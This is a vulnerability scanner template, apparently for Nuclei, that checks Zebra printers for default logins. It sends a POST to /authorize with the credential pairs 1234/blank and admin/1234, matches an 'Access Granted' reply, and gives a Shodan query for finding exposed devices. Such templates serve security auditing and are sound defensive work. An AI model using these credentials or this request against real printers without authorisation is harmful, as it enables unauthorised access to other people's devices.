漏洞描述
Zebra default login credentials was discovered.
id: zebra-default-login
info:
name: Zebra - Default Login
author: y0no
severity: high
description: |
Zebra default login credentials was discovered.
metadata:
verified: true
max-request: 4
shodan-query: title:"Zebra"
tags: zebra,default-login,misconfig,printer,vuln
http:
- raw:
- |
POST /authorize HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
0={{username}}&1={{password}}
attack: pitchfork
payloads:
username:
- 1234
- admin
password:
- ''
- 1234
matchers-condition: and
matchers:
- type: word
part: body
words:
- ">Access Granted. This IP Address now"
- type: status
status:
- 200
# digest: 490a0046304402200961a69312d7fbaeab2f5dddd0612850b60a4611056d5d052665b1935b8dbc2802205c5b75579b60a959356edfdbc9d6b7ca8911dbe07b7dadee91154766f695b634:922c64590222798bb761d5b6d8e72950